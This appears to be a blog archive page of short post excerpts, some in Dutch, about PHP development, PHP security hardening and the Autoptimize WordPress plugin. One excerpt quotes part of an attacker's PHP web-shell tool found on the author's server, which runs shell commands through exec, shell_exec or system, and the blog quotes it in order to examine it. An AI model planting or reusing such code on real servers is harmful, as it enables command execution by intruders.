Google App Engine project template for PHP (with Quercus)

So you’re a wanna-be developer who’d love to deploy in the cloud, but you only¬† “know” PHP? Well, as you might already have read elsewhere Caucho, the company behind Resin, has a 100% Java GPL’ed implementation of PHP5 called Quercus that can be used to run PHP on GAE. It took me some time to […]

PHP OAuth extension: trial, error and success

I’ve been experimenting with the PHP OAuth PECL extension over the last few days and initially ran into some small problems getting it to function correctly. So for the sake of making this world wide web an even better place, here are some error-messages you might encounter and what you could do to resolve them: […]

Fun with caching in PHP with APC (and others)

After installing APC, I looked through the documentation on php.net and noticed 3 interesting functions with regards to session-independent data caching in PHP; apc_store; store a variable in cache apc_fetch; retrieve the variable from cache apc_delete; remove the variable from cache When talking about caching, apc_delete might not be that important, as apc_store allows you […]

PHP security: Eval is evil?

Naar aanleiding van mijn vorige post een beetje naar de tooltjes zitten kijken die de script kiddies op mijn serverken loslaten. Een voorbeeldje: <?php echo “549821347819481<br>”; $cmd=”id”; $eseguicmd=ex($cmd); echo $eseguicmd.”<br>”; function ex($cfe){ $res = ”; if (!empty($cfe)){ if(function_exists(‘exec’)){ @exec($cfe,$res); $res = join(“\n”,$res); } elseif(function_exists(‘shell_exec’)){ $res = @shell_exec($cfe); } elseif(function_exists(‘system’)){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); […]

PHP kan uw gezondheid ernstige schade berokkenen

PHP is krachtig gereedschap. Net als met een goeie cirkelzaag of een stevige voorhamer kun je met PHP veel goeds, maar ook veel slechts doen. Volgende eenvoudige wijzigingen in php.ini zouden je installatie veel veiliger moeten kunnen maken; Zet “allow_url_fopen” op “off” zodat er met PHP via remote files geen ‘vijandige’ code kan binnengehaald worden. […]

Want to test AVIF images with Autoptimize’s Image Optimization?

So AVIF is a new(ish) image format that promises even better optimization then WebP and is supported in desktop Chrome & behind a preference in Firefox; go to about:config and set image.avif.enabled to true. If you are using Autoptimize to optimize your images and you want to test AVIF images, you can use below code […]

Autoptimize < 2.7.7 security vulnerabilities debrief

With Autoptimize 2.7.7 released on August the 23rd and having been pushed to all sites that were still on 2.7.0-2.7.6 by the WordPress plugins team on Aug. 30th and 31th, resulting in just under one million downloads in 8 days time, it is now the moment for a small debrief of the security issues that […]